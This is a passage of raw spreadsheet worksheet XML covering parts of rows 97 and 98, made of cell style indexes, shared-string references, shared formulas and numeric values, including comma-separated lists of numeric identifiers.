        <v>0</v>
      </c>
      <c r="EX97" s="110">
        <f t="shared" si="136"/>
        <v>23</v>
      </c>
      <c r="EY97" s="110">
        <f t="shared" si="137"/>
        <v>23</v>
      </c>
      <c r="EZ97" s="110">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="FA97" s="110">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="FB97" s="110">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="FC97" s="111" t="s">
        <v>1682</v>
      </c>
      <c r="FD97" s="111">
        <v>10.0</v>
      </c>
      <c r="FE97" s="111">
        <v>33.0</v>
      </c>
      <c r="FF97" s="101" t="s">
        <v>1683</v>
      </c>
      <c r="FG97" s="111" t="s">
        <v>1680</v>
      </c>
      <c r="FH97" s="111">
        <v>6.0</v>
      </c>
      <c r="FI97" s="111">
        <v>23.0</v>
      </c>
      <c r="FJ97" s="111" t="s">
        <v>1682</v>
      </c>
      <c r="FK97" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FL97" s="111" t="str">
        <f t="shared" si="155"/>
        <v>655, 1394, 1917, 3065, 38043, 23858, 2101917, 2002752, 2002749, 2001117</v>
      </c>
      <c r="FM97" s="111">
        <v>655.0</v>
      </c>
      <c r="FN97" s="111" t="s">
        <v>1684</v>
      </c>
      <c r="FO97" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP97" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ97" s="111">
        <v>0.0</v>
      </c>
      <c r="FR97" s="111">
        <v>0.0</v>
      </c>
      <c r="FS97" s="112">
        <v>10.0</v>
      </c>
      <c r="FT97" s="112">
        <v>5.0</v>
      </c>
      <c r="FU97" s="112">
        <v>11.0</v>
      </c>
      <c r="FV97" s="112">
        <v>23.0</v>
      </c>
      <c r="FW97" s="112">
        <v>13.0</v>
      </c>
      <c r="FX97" s="112">
        <v>36.0</v>
      </c>
      <c r="FY97" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ97" s="112">
        <v>0.0</v>
      </c>
      <c r="GA97" s="112">
        <v>0.0</v>
      </c>
      <c r="GB97" s="112">
        <v>0.0</v>
      </c>
      <c r="GC97" s="112">
        <v>1.0</v>
      </c>
      <c r="GD97" s="112">
        <v>5.0</v>
      </c>
      <c r="GE97" s="112">
        <v>23.0</v>
      </c>
      <c r="GF97" s="112">
        <v>0.0</v>
      </c>
      <c r="GG97" s="112">
        <v>23.0</v>
      </c>
      <c r="GH97" s="113">
        <f t="shared" si="139"/>
        <v>5</v>
      </c>
      <c r="GI97" s="113">
        <f t="shared" si="140"/>
        <v>1</v>
      </c>
      <c r="GJ97" s="113">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="GK97" s="113">
        <f t="shared" si="142"/>
        <v>11</v>
      </c>
      <c r="GL97" s="113">
        <f t="shared" si="143"/>
        <v>5</v>
      </c>
      <c r="GM97" s="113">
        <f t="shared" si="144"/>
        <v>0</v>
      </c>
      <c r="GN97" s="113">
        <f t="shared" si="145"/>
        <v>36</v>
      </c>
      <c r="GO97" s="113">
        <f t="shared" si="146"/>
        <v>23</v>
      </c>
      <c r="GP97" s="113">
        <f t="shared" si="147"/>
        <v>0</v>
      </c>
      <c r="GQ97" s="114">
        <f t="shared" si="108"/>
        <v>0</v>
      </c>
      <c r="GR97" s="113">
        <f t="shared" si="109"/>
        <v>0</v>
      </c>
      <c r="GS97" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT97" s="94"/>
      <c r="GU97" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV97" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW97" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX97" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY97" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ97" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA97" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB97" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC97" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD97" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE97" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF97" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG97" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH97" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI97" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ97" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK97" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL97" s="93">
        <v>10.0</v>
      </c>
      <c r="HM97" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN97" s="93">
        <v>0.0</v>
      </c>
      <c r="HO97" s="93">
        <v>0.0</v>
      </c>
      <c r="HP97" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ97" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR97" s="118">
        <f t="shared" si="54"/>
        <v>0</v>
      </c>
      <c r="HS97" s="118">
        <f t="shared" si="55"/>
        <v>0</v>
      </c>
      <c r="HT97" s="139" t="s">
        <v>1685</v>
      </c>
      <c r="HU97" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV97" s="119" t="s">
        <v>1686</v>
      </c>
      <c r="HW97" s="119">
        <v>3.0</v>
      </c>
      <c r="HX97" s="119">
        <v>6.0</v>
      </c>
      <c r="HY97" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ97" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA97" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB97" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC97" s="120" t="str">
        <f>HV97</f>
        <v>56953, 56951, 57018, 56952</v>
      </c>
      <c r="ID97" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE97" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF97" s="120" t="s">
        <v>1686</v>
      </c>
      <c r="IG97" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH97" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II97" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ97" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK97" s="99">
        <v>10.0</v>
      </c>
      <c r="IL97" s="99">
        <v>0.0</v>
      </c>
      <c r="IM97" s="121">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="IN97" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO97" s="98">
        <v>0.0</v>
      </c>
      <c r="IP97" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ97" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR97" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS97" s="124" t="s">
        <v>225</v>
      </c>
      <c r="IT97" s="127"/>
      <c r="IU97" s="127"/>
      <c r="IV97" s="127"/>
      <c r="IW97" s="127"/>
      <c r="IX97" s="127"/>
      <c r="IY97" s="127"/>
      <c r="IZ97" s="127"/>
      <c r="JA97" s="127"/>
      <c r="JB97" s="127"/>
      <c r="JC97" s="127"/>
      <c r="JD97" s="127"/>
      <c r="JE97" s="127"/>
      <c r="JF97" s="127"/>
      <c r="JG97" s="127"/>
      <c r="JH97" s="127"/>
      <c r="JI97" s="127"/>
      <c r="JJ97" s="127"/>
      <c r="JK97" s="127"/>
      <c r="JL97" s="127"/>
      <c r="JM97" s="127"/>
      <c r="JN97" s="127"/>
      <c r="JO97" s="127"/>
      <c r="JP97" s="127"/>
      <c r="JQ97" s="127"/>
      <c r="JR97" s="127"/>
      <c r="JS97" s="127"/>
      <c r="JT97" s="127"/>
      <c r="JU97" s="127"/>
      <c r="JV97" s="127"/>
      <c r="JW97" s="127"/>
      <c r="JX97" s="127"/>
      <c r="JY97" s="127"/>
      <c r="JZ97" s="127"/>
      <c r="KA97" s="127"/>
      <c r="KB97" s="127"/>
      <c r="KC97" s="127"/>
      <c r="KD97" s="127"/>
      <c r="KE97" s="127"/>
      <c r="KF97" s="127"/>
      <c r="KG97" s="127"/>
      <c r="KH97" s="127"/>
      <c r="KI97" s="127"/>
      <c r="KJ97" s="127"/>
      <c r="KK97" s="127"/>
      <c r="KL97" s="127"/>
      <c r="KM97" s="127"/>
      <c r="KN97" s="127"/>
      <c r="KO97" s="127"/>
      <c r="KP97" s="127"/>
      <c r="KQ97" s="127"/>
      <c r="KR97" s="127"/>
      <c r="KS97" s="127"/>
      <c r="KT97" s="127"/>
      <c r="KU97" s="127"/>
      <c r="KV97" s="127"/>
      <c r="KW97" s="127"/>
      <c r="KX97" s="127"/>
      <c r="KY97" s="127"/>
      <c r="KZ97" s="127"/>
      <c r="LA97" s="127"/>
      <c r="LB97" s="127"/>
      <c r="LC97" s="127"/>
      <c r="LD97" s="127"/>
      <c r="LE97" s="127"/>
      <c r="LF97" s="127"/>
      <c r="LG97" s="127"/>
      <c r="LH97" s="127"/>
      <c r="LI97" s="127"/>
      <c r="LJ97" s="127"/>
      <c r="LK97" s="127"/>
      <c r="LL97" s="127"/>
      <c r="LM97" s="127"/>
      <c r="LN97" s="127"/>
      <c r="LO97" s="127"/>
      <c r="LP97" s="127"/>
      <c r="LQ97" s="127"/>
      <c r="LR97" s="127"/>
      <c r="LS97" s="127"/>
      <c r="LT97" s="127"/>
      <c r="LU97" s="127"/>
      <c r="LV97" s="127"/>
      <c r="LW97" s="127"/>
      <c r="LX97" s="127"/>
      <c r="LY97" s="127"/>
      <c r="LZ97" s="127"/>
      <c r="MA97" s="127"/>
      <c r="MB97" s="127"/>
      <c r="MC97" s="127"/>
      <c r="MD97" s="127"/>
      <c r="ME97" s="127"/>
      <c r="MF97" s="127"/>
      <c r="MG97" s="127"/>
      <c r="MH97" s="127"/>
      <c r="MI97" s="127"/>
      <c r="MJ97" s="127"/>
      <c r="MK97" s="127"/>
      <c r="ML97" s="127"/>
      <c r="MM97" s="127"/>
      <c r="MN97" s="127"/>
      <c r="MO97" s="127"/>
      <c r="MP97" s="127"/>
      <c r="MQ97" s="127"/>
      <c r="MR97" s="127"/>
      <c r="MS97" s="127"/>
      <c r="MT97" s="127"/>
      <c r="MU97" s="127"/>
      <c r="MV97" s="127"/>
      <c r="MW97" s="127"/>
      <c r="MX97" s="127"/>
      <c r="MY97" s="127"/>
      <c r="MZ97" s="127"/>
      <c r="NA97" s="127"/>
      <c r="NB97" s="127"/>
      <c r="NC97" s="127"/>
      <c r="ND97" s="127"/>
      <c r="NE97" s="127"/>
      <c r="NF97" s="127"/>
      <c r="NG97" s="127"/>
      <c r="NH97" s="127"/>
      <c r="NI97" s="127"/>
      <c r="NJ97" s="127"/>
      <c r="NK97" s="127"/>
      <c r="NL97" s="127"/>
      <c r="NM97" s="127"/>
      <c r="NN97" s="127"/>
      <c r="NO97" s="127"/>
      <c r="NP97" s="127"/>
      <c r="NQ97" s="127"/>
      <c r="NR97" s="127"/>
      <c r="NS97" s="127"/>
      <c r="NT97" s="127"/>
      <c r="NU97" s="127"/>
      <c r="NV97" s="127"/>
      <c r="NW97" s="127"/>
      <c r="NX97" s="127"/>
      <c r="NY97" s="127"/>
    </row>
    <row r="98" ht="153.75" customHeight="1">
      <c r="B98" s="89" t="s">
        <v>292</v>
      </c>
      <c r="C98" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D98" s="90" t="s">
        <v>293</v>
      </c>
      <c r="E98" s="90" t="s">
        <v>1687</v>
      </c>
      <c r="F98" s="90" t="s">
        <v>1688</v>
      </c>
      <c r="G98" s="90" t="s">
        <v>12</v>
      </c>
      <c r="H98" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I98" s="92" t="s">
        <v>1689</v>
      </c>
      <c r="J98" s="92" t="s">
        <v>1690</v>
      </c>
      <c r="K98" s="92" t="s">
        <v>1691</v>
      </c>
      <c r="L98" s="93" t="s">
        <v>317</v>
      </c>
      <c r="M98" s="93">
        <v>76.0</v>
      </c>
      <c r="N98" s="93">
        <v>2.0</v>
      </c>
      <c r="O98" s="93">
        <v>0.0</v>
      </c>
      <c r="P98" s="93">
        <v>1.0</v>
      </c>
      <c r="Q98" s="93">
        <f t="shared" si="160"/>
        <v>1</v>
      </c>
      <c r="R98" s="93">
        <v>1.0</v>
      </c>
      <c r="S98" s="93">
        <v>0.0</v>
      </c>
      <c r="T98" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U98" s="95" t="s">
        <v>219</v>
      </c>
      <c r="V98" s="96" t="s">
        <v>1194</v>
      </c>
      <c r="W98" s="96" t="s">
        <v>1692</v>
      </c>
      <c r="X98" s="132" t="s">
        <v>1693</v>
      </c>
      <c r="Y98" s="126" t="s">
        <v>1694</v>
      </c>
      <c r="Z98" s="132" t="s">
        <v>1695</v>
      </c>
      <c r="AA98" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB98" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC98" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD98" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE98" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF98" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG98" s="98" t="s">
        <v>306</v>
      </c>
      <c r="AH98" s="99" t="s">
        <v>1696</v>
      </c>
      <c r="AI98" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ98" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AK98" s="100">
        <v>254.0</v>
      </c>
      <c r="AL98" s="100">
        <v>1.0</v>
      </c>
      <c r="AM98" s="100">
        <v>5.0</v>
      </c>
      <c r="AN98" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO98" s="100">
        <v>254.0</v>
      </c>
      <c r="AP98" s="100">
        <v>1.0</v>
      </c>
      <c r="AQ98" s="100">
        <v>5.0</v>
      </c>
      <c r="AR98" s="100">
        <v>254.0</v>
      </c>
      <c r="AS98" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT98" s="100">
        <f t="shared" si="158"/>
        <v>254</v>
      </c>
      <c r="AU98" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV98" s="100">
        <v>254.0</v>
      </c>
      <c r="AW98" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX98" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY98" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ98" s="100">
        <v>0.0</v>
      </c>
      <c r="BA98" s="102">
        <v>76.0</v>
      </c>
      <c r="BB98" s="102">
        <v>5.0</v>
      </c>
      <c r="BC98" s="102">
        <v>5.0</v>
      </c>
      <c r="BD98" s="102">
        <v>5.0</v>
      </c>
      <c r="BE98" s="102">
        <v>0.0</v>
      </c>
      <c r="BF98" s="102">
        <v>0.0</v>
      </c>
      <c r="BG98" s="102">
        <v>0.0</v>
      </c>
      <c r="BH98" s="102">
        <v>0.0</v>
      </c>
      <c r="BI98" s="102">
        <v>5.0</v>
      </c>
      <c r="BJ98" s="102">
        <v>5.0</v>
      </c>
      <c r="BK98" s="102">
        <v>5.0</v>
      </c>
      <c r="BL98" s="103">
        <f t="shared" si="112"/>
        <v>2.5</v>
      </c>
      <c r="BM98" s="103">
        <f t="shared" si="113"/>
        <v>2.5</v>
      </c>
      <c r="BN98" s="103">
        <f t="shared" si="114"/>
        <v>0</v>
      </c>
      <c r="BO98" s="103">
        <f t="shared" si="115"/>
        <v>5</v>
      </c>
      <c r="BP98" s="103">
        <f t="shared" si="116"/>
        <v>5</v>
      </c>
      <c r="BQ98" s="103">
        <f t="shared" si="117"/>
        <v>0</v>
      </c>
      <c r="BR98" s="103">
        <f t="shared" si="118"/>
        <v>5</v>
      </c>
      <c r="BS98" s="103">
        <f t="shared" si="119"/>
        <v>5</v>
      </c>
      <c r="BT98" s="103">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BU98" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV98" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW98" s="104">
        <v>254.0</v>
      </c>
      <c r="BX98" s="104">
        <v>1.0</v>
      </c>
      <c r="BY98" s="104">
        <v>5.0</v>
      </c>
      <c r="BZ98" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA98" s="104">
        <v>254.0</v>
      </c>
      <c r="CB98" s="104">
        <v>1.0</v>
      </c>
      <c r="CC98" s="104">
        <v>5.0</v>
      </c>
      <c r="CD98" s="104">
        <v>254.0</v>
      </c>
      <c r="CE98" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF98" s="104">
        <f t="shared" si="161"/>
        <v>254</v>
      </c>
      <c r="CG98" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH98" s="104">
        <v>254.0</v>
      </c>
      <c r="CI98" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ98" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK98" s="104">
        <v>0.0</v>
      </c>
      <c r="CL98" s="104">
        <v>0.0</v>
      </c>
      <c r="CM98" s="105">
        <v>76.0</v>
      </c>
      <c r="CN98" s="105">
        <v>5.0</v>
      </c>
      <c r="CO98" s="105">
        <v>5.0</v>
      </c>
      <c r="CP98" s="105">
        <v>5.0</v>
      </c>
      <c r="CQ98" s="105">
        <v>0.0</v>
      </c>
      <c r="CR98" s="105">
        <v>5.0</v>
      </c>
      <c r="CS98" s="105">
        <v>0.0</v>
      </c>
      <c r="CT98" s="105">
        <v>0.0</v>
      </c>
      <c r="CU98" s="105">
        <v>0.0</v>
      </c>
      <c r="CV98" s="105">
        <v>0.0</v>
      </c>
      <c r="CW98" s="105">
        <v>5.0</v>
      </c>
      <c r="CX98" s="105">
        <v>5.0</v>
      </c>
      <c r="CY98" s="105">
        <v>5.0</v>
      </c>
      <c r="CZ98" s="105">
        <v>0.0</v>
      </c>
      <c r="DA98" s="105">
        <v>5.0</v>
      </c>
      <c r="DB98" s="106">
        <f t="shared" si="122"/>
        <v>2.5</v>
      </c>
      <c r="DC98" s="106">
        <f t="shared" si="123"/>
        <v>2.5</v>
      </c>
      <c r="DD98" s="106">
        <f t="shared" si="124"/>
        <v>0</v>
      </c>
      <c r="DE98" s="106">
        <f t="shared" si="125"/>
        <v>5</v>
      </c>
      <c r="DF98" s="106">
        <f t="shared" si="126"/>
        <v>5</v>
      </c>
      <c r="DG98" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH98" s="106">
        <f t="shared" si="127"/>
        <v>5</v>
      </c>
      <c r="DI98" s="106">
        <f t="shared" si="128"/>
        <v>5</v>
      </c>
      <c r="DJ98" s="106">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="DK98" s="107">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="DL98" s="106">
        <f t="shared" si="105"/>
        <v>0</v>
      </c>
      <c r="DM98" s="108" t="s">
        <v>1697</v>
      </c>
      <c r="DN98" s="108">
        <v>2.0</v>
      </c>
      <c r="DO98" s="108">
        <v>7.0</v>
      </c>
      <c r="DP98" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ98" s="108" t="s">
        <v>1697</v>
      </c>
      <c r="DR98" s="108">
        <v>2.0</v>
      </c>
      <c r="DS98" s="108">
        <v>7.0</v>
      </c>
      <c r="DT98" s="108" t="s">
        <v>1697</v>
      </c>
      <c r="DU98" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV98" s="108" t="str">
        <f t="shared" si="154"/>
        <v>254, 59597</v>
      </c>
      <c r="DW98" s="108">
        <v>59597.0</v>
      </c>
      <c r="DX98" s="108">
        <v>254.0</v>
      </c>
      <c r="DY98" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ98" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA98" s="108">
        <v>0.0</v>
      </c>
      <c r="EB98" s="108">
        <v>0.0</v>
      </c>
      <c r="EC98" s="109">
        <v>76.0</v>
      </c>
      <c r="ED98" s="109">
        <v>7.0</v>
      </c>
      <c r="EE98" s="109">
        <v>7.0</v>
      </c>
      <c r="EF98" s="109">
        <v>7.0</v>
      </c>
      <c r="EG98" s="109">
        <v>0.0</v>
      </c>
      <c r="EH98" s="109">
        <v>7.0</v>
      </c>
      <c r="EI98" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ98" s="109">
        <v>0.0</v>
      </c>
      <c r="EK98" s="109">
        <v>0.0</v>
      </c>
      <c r="EL98" s="109">
        <v>0.0</v>
      </c>
      <c r="EM98" s="109">
        <v>7.0</v>
      </c>
      <c r="EN98" s="109">
        <v>7.0</v>
      </c>
      <c r="EO98" s="109">
        <v>7.0</v>
      </c>
      <c r="EP98" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ98" s="109">
        <v>7.0</v>
      </c>
      <c r="ER98" s="110">
        <f t="shared" si="130"/>
        <v>3.5</v>
      </c>
      <c r="ES98" s="110">
        <f t="shared" si="131"/>
        <v>3.5</v>
      </c>
      <c r="ET98" s="110">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="EU98" s="110">
        <f t="shared" si="133"/>
        <v>7</v>
      </c>
      <c r="EV98" s="110">
        <f t="shared" si="134"/>
        <v>7</v>
      </c>
      <c r="EW98" s="110">
        <f t="shared" si="135"/>
        <v>0</v>
      </c>
      <c r="EX98" s="110">
        <f t="shared" si="136"/>
        <v>7</v>
      </c>
      <c r="EY98" s="110">
        <f t="shared" si="137"/>
        <v>7</v>
      </c>
      <c r="EZ98" s="110">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="FA98" s="110">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="FB98" s="110">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="FC98" s="111" t="s">
        <v>1698</v>
      </c>
      <c r="FD98" s="111">
        <v>4.0</v>
      </c>
      <c r="FE98" s="111">
        <v>21.0</v>
      </c>
      <c r="FF98" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG98" s="111" t="s">
        <v>1697</v>
      </c>
      <c r="FH98" s="111">
        <v>2.0</v>
      </c>
      <c r="FI98" s="111">
        <v>7.0</v>
      </c>
      <c r="FJ98" s="111" t="s">
        <v>1698</v>
      </c>
      <c r="FK98" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL98" s="111" t="str">
        <f t="shared" si="155"/>
        <v>2002752, 2002749, 254, 59597</v>
      </c>
      <c r="FM98" s="111">
        <v>59597.0</v>
      </c>
      <c r="FN98" s="111" t="s">
        <v>1408</v>
      </c>
      <c r="FO98" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP98" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ98" s="111">
        <v>0.0</v>
      </c>
      <c r="FR98" s="111">
        <v>0.0</v>
      </c>
      <c r="FS98" s="112">
        <v>76.0</v>
      </c>
      <c r="FT98" s="112">
        <v>17.0</v>
      </c>
      <c r="FU98" s="112">
        <v>19.0</v>
      </c>
      <c r="FV98" s="112">
        <v>7.0</v>
      </c>
      <c r="FW98" s="112">
        <v>14.0</v>
      </c>
      <c r="FX98" s="112">
        <v>21.0</v>
      </c>
      <c r="FY98" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ98" s="112">
        <v>0.0</v>
      </c>
      <c r="GA98" s="112">
        <v>0.0</v>
      </c>
      <c r="GB98" s="112">
        <v>0.0</v>
      </c>
      <c r="GC98" s="112">
        <v>7.0</v>
      </c>
      <c r="GD98" s="112">
        <v>7.0</v>
      </c>
      <c r="GE98" s="112">
        <v>7.0</v>
      </c>
      <c r="GF98" s="112">
        <v>0.0</v>
      </c>
      <c r="GG98" s="112">
        <v>7.0</v>
      </c>
      <c r="GH98" s="113">
        <f t="shared" si="139"/>
        <v>8.5</v>
      </c>
      <c r="GI98" s="113">
        <f t="shared" si="140"/>
        <v>3.5</v>
      </c>
      <c r="GJ98" s="113">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="GK98" s="113">
        <f t="shared" si="142"/>
        <v>19</v>
      </c>
      <c r="GL98" s="113">
        <f t="shared" si="143"/>
        <v>7</v>
      </c>
      <c r="GM98" s="113">
        <f t="shared" si="144"/>
        <v>0</v>
      </c>
      <c r="GN98" s="113">
        <f t="shared" si="145"/>
        <v>21</v>
      </c>
      <c r="GO98" s="113">
        <f t="shared" si="146"/>
        <v>7</v>
      </c>
      <c r="GP98" s="113">
        <f t="shared" si="147"/>
        <v>0</v>
      </c>
      <c r="GQ98" s="114">
        <f t="shared" si="108"/>
        <v>0</v>
      </c>
      <c r="GR98" s="113">
        <f t="shared" si="109"/>
        <v>0</v>
      </c>
      <c r="GS98" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT98" s="94"/>
      <c r="GU98" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV98" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW98" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX98" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY98" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ98" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA98" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB98" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC98" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD98" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE98" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF98" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG98" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH98" s="116">
        <v>41469.0</v>
      </c>
      <c r="HI98" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ98" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK98" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL98" s="93">
        <v>75.0</v>
      </c>
      <c r="HM98" s="93">
        <f t="shared" si="83"/>
        <v>2</v>
      </c>
      <c r="HN98" s="93">
        <v>0.0</v>
      </c>
      <c r="HO98" s="93">
        <v>2.0</v>
      </c>
      <c r="HP98" s="93">
        <v>2.0</v>
      </c>
      <c r="HQ98" s="118">
        <f t="shared" si="53"/>
        <v>1</v>
      </c>
      <c r="HR98" s="118">
        <f t="shared" si="54"/>
        <v>1</v>
      </c>
      <c r="HS98" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT98" s="139" t="s">
        <v>1699</v>
      </c>
      <c r="HU98" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV98" s="119" t="s">
        <v>1700</v>
      </c>
      <c r="HW98" s="119">
        <v>3.0</v>
      </c>
      <c r="HX98" s="119">
        <v>17.0</v>
      </c>
      <c r="HY98" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ98" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA98" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB98" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC98" s="120" t="s">
        <v>1701</v>
      </c>
      <c r="ID98" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE98" s="120">
        <v>9999.0</v>
      </c>
      <c r="IF98" s="120" t="s">
        <v>1700</v>
      </c>
      <c r="IG98" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH98" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II98" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ98" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK98" s="99">
        <v>75.0</v>
      </c>
      <c r="IL98" s="99">
        <v>0.0</v>
      </c>
      <c r="IM98" s="121">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="IN98" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO98" s="98">
        <v>0.0</v>
      </c>
      <c r="IP98" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ98" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR98" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS98" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT98" s="127"/>
      <c r="IU98" s="127"/>
      <c r="IV98" s="127"/>
      <c r="IW98" s="127"/>
      <c r="IX98" s="127"/>
      <c r="IY98" s="127"/>
      <c r="IZ98" s="127"/>
      <c r="JA98" s="127"/>
      <c r="JB98" s="127"/>
      <c r="JC98" s="127"/>
      <c r="JD98" s="127"/>
      <c r="JE98" s="127"/>
      <c r="JF98" s="127"/>
      <c r="JG98" s="127"/>
      <c r="JH98" s="127"/>
      <c r="JI98" s="127"/>
      <c r="JJ98" s="127"/>
      <c r="JK98" s="127"/>
      <c r="JL98" s="127"/>
      <c r="JM98" s="127"/>
      <c r="JN98" s="127"/>
      <c r="JO98" s="127"/>
      <c r="JP98" s="127"/>
      <c r="JQ98" s="127"/>
      <c r="JR98" s="127"/>
      <c r="JS98" s="127"/>
      <c r="JT98" s="127"/>
      <c r="JU98" s="127"/>
      <c r="JV98" s="127"/>
      <c r="JW98" s="127"/>
      <c r="JX98" s="127"/>
      <c r="JY98" s="127"/>
      <c r="JZ98" s="127"/>
      <c r="KA98" s="127"/>
      <c r="KB98" s="127"/>
      <c r="KC98" s="127"/>
      <c r="KD98" s="127"/>
      <c r="KE98" s="127"/>
      <c r="KF98" s="127"/>
      <c r="KG98" s="127"/>
      <c r="KH98" s="127"/>
